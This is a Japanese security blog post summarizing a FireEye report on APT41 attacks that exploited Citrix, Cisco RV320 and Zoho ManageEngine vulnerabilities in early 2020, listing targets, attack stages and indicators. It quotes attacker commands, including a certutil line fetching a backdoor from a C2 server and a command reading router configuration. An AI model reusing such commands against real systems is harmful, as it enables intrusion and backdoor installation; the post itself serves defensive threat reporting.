APT41によるCitrixやCisco、ZOHO製品の脆弱性を悪用した攻撃観測
攻撃グループWinntiグループとの関連性が強いとされるAPT41の攻撃観測について、FireEyeよりブログ記事が公開されました。
2020年になってからの1月20日から3月11日の期間に、Citrix ADCおよびNetScaler GatewayやCisco routers、Zoho ManageEngine Desktop Centralといった製品の脆弱性をついた攻撃がFireEyeの顧客において観測されたとのことです。
APT41の概要およびその定義については、FireEyeが昨年レポートを公開しているので、ご参考までにご活用ください。
https://content.fireeye.com/apt-41/rpt-apt41/
また、Winntiグループについては、年明けに公開した以下の記事をはじめ、当ブログ内でもたびたび公開しているので、是非ご参考にしてください。
目次
標的となった国および組織
今回のレポートでは攻撃が観測された国として、以下の国々が挙げられています。
| アジア | 欧州 | 北米 | 南米 | オセアニア |
|---|---|---|---|---|
| 日本 | デンマーク | カナダ | メキシコ | オーストラリア |
| マレーシア | フィンランド | 米国 | ||
| インド | フランス | |||
| フィリピン | イタリア | |||
| カタール | ポーランド | |||
| サウジアラビア | スウェーデン | |||
| シンガポール | スイス | |||
| UAE | 英国 |
なお、業種は以下だとされています。
金融、建設、防衛、政府、ヘルスケア、ハイテクノロジー、高等教育、法務、製造業、メディア、非営利団体、石油・ガス、石油化学、製薬、不動産、通信、輸送、旅行、生活インフラ事業者
ほぼ全部やん。。。
悪用した脆弱性別攻撃手法
今回の攻撃活動では主に3つの脆弱性が悪用されたのですが、それぞれ個別に確認していきます。
なお、全体の流れを図にしたものを、FireEyeが作成していましたので、こちらも掲載させていただきます。
CVE-2019-19781 Citrix Application Delivery Controllerの脆弱性
CVE-2019-19781は2019年12月17日に公開されたもので、JPCERT/CCからも日本国内での攻撃が観測されたとのことで、注意喚起が発行されていました。
本脆弱性について、APT41はIPアドレス66.42.98[.]220に紐づくインフラを用いて悪用を試みたとのことです。
その中で、
file /bin/pwd
を実行することで、脆弱性が存在するかどうかの確認および侵入後のバックドア展開を考えた場合の事前情報取得を狙っていたと考えられます。
この辺りの、調査コマンドについて、過去にJPCERT/CCが公開していたかなと思ったのですが、Windows版でした。惜しい。
なお、FireEyeによると脆弱性を悪用した活動はCitrix製品のみに対して行われており、場当たり的な攻撃ではなく、事前にリストを用意しておくなどの、準備が行われていた可能性があると言及しています。
まさに標的型攻撃ですね。
なお、1月23日から2月1日のいわゆる旧正月期間は休止し、その後2月1日にはFTPを利用した本格的な侵害活動移行しているとのことです。
具体的には、以下のコマンドを実行し、ftpの通信を確立した上で、testユーザと改変したパスワードを用いてFTPサーバへのログインおよびバックドアのダウンロードを実現しています。
記事中では、bsdというペイロードがどうやらバックドアっぽいと言及するにとどめています。
その後2月2日以降間を開けたのち、2月19日にunとペイロードの名前を変えて同様の攻撃を行なっています。
CVE-2019-1652/CVE-2019-1653およびCVE-2019-1652 Ciscoルーターの脆弱性
先述の2月19日のCitrix脆弱性を悪用した攻撃ののち、2月21日にはCisco RV320の脆弱性を悪用した攻撃が観測されたとのことです。
悪用されたのはCVE-2019-1652およびCVE-2019-1653であり、小規模組織で利用されるようなCisco RV320およびRV325が対象です。
攻撃用のペイロードとしては、ペネトレーションツールであるMetasploit専用のモジュールがwgetで取得されていることが確認されています。
先述の攻撃インフラ66.42.98[.]220には以下のように1.txtが配置されていました。
http[:]//66.42.98[.]220/test/1.txt
この1.txtには以下のコマンドが記載されており、Cisco RV320ルータのconfigファイル(設定情報)を表示する試みが見られます。
cat /etc/flash/etc/nk_sysconfig
CVE-2020-10189 Zoho ManageEngineの脆弱性
本脆弱性については今月の上旬に、別の記事でも紹介しているので、記憶に新しい人もいるのではないでしょうか。
その後、3月8日には、Zoho ManageEngineの脆弱性CVE-2020-10189を悪用した攻撃が観測されたとのことです。
本攻撃では、install.batおよびstoresyncsvc.dllの2つのペイロードを使用していることをが確認されています。
そして、このstoresyncsvc.dllについて、実はCobalt Strike BEACON loaderのトライアルバージョンだとのことです。
そして、これらを利用するにあたって、2種類の手法を用いているとのことです。
1つ目の手法は、logger.zipというJavaベースのプログラムをアップロードし、そのプログラム中に含まれるPowershellコマンド経由で、install.batおよびstoresyncsvc.dllを落としてきます。
2つ目の手法は、MicrosoftのBITSAdminというツールを使ってinstall.batを落としてきます。
いずれの手法も、通信インフラは変わらず66.42.98[.]220でポート番号には12345を利用しています。
storescyncsvc.dllを実行することで、攻撃者はMicrosoft CertUtil を利用して、別のC2サーバより、新たなバックドア2.exeを落として来ます。
実行コマンドの例
certutil -urlcache -split -f http://91.208.184[.]78/2.exe
2.exeはVMProtectを施した、Meterpreterダウンローダ(Metasploit専用のモジュール)で、TzGGという名前のCobalt Strikeビーコンを最終的には取得します。
このビーコンもトライアルバージョンだとのことです。
CobaltStrikeビーコンを利用することで遠隔から感染端末の操作を行うことができるため、バックドアのように活用し、諜報活動を継続的に実施することができます。
CobaltStrikeはTickなど、他の中華系グループも利用するので、その辺りも関連するのではないかと、疑ってしまいますね。
まとめ
この記事だけ見ると、攻撃インフラはそのままに、攻撃手法の切り替えが非常に早いですね。
試しに検索エンジンshodanを確認すると
https://www.shodan.io/host/66.42.98.220
当該IPアドレスはvultrのVPSを利用している感じですね。
SSHのポートが空いてるので、ここを起点にしている様子が伺えます。
というかここで空いてるポート8009ってtomcatのAJPで使われるやつ。。。 何かしらのWebアプリケーションを動かしているんですかね。
まあ、あとはセキュリティベンダーさんが踏み込んだ調査をしてくれるでしょう笑
